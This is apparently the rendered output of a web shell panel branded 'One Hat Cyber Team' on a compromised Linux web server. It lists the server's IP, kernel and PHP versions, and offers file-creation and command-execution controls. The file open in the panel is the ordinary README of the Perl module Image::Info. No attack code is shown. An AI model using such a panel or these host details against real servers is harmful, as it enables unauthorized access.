����
One Hat Cyber Team
One Hat Cyber Team
Your IP :
18.218.155.110
Server IP :
192.185.194.254
Server :
Linux raider.websitewelcome.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Server Software :
Apache
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
perl-Image-Info-1.33
/
View File Name :
README
This Perl extension allows you to extract meta information from various types of image files. The following file formats are supported: JPEG (plain JFIF and Exif) PNG GIF PBM/PGM/PPM SVG XBM/XPM BMP/DIB/RLE Usage is something like this: use Image::Info qw(image_info); @info = image_info("filename"); $refto_hash_describing_1st_image = $info[0]; $refto_hash_describing_2nd_image = $info[1]; Copyright 1999-2004 Gisle Aas. Now maintained by Slaven Rezic <srezic@cpan.org> This library is free software; you can redistribute it and/or modify it under the same terms as Perl v5.8.8 itself.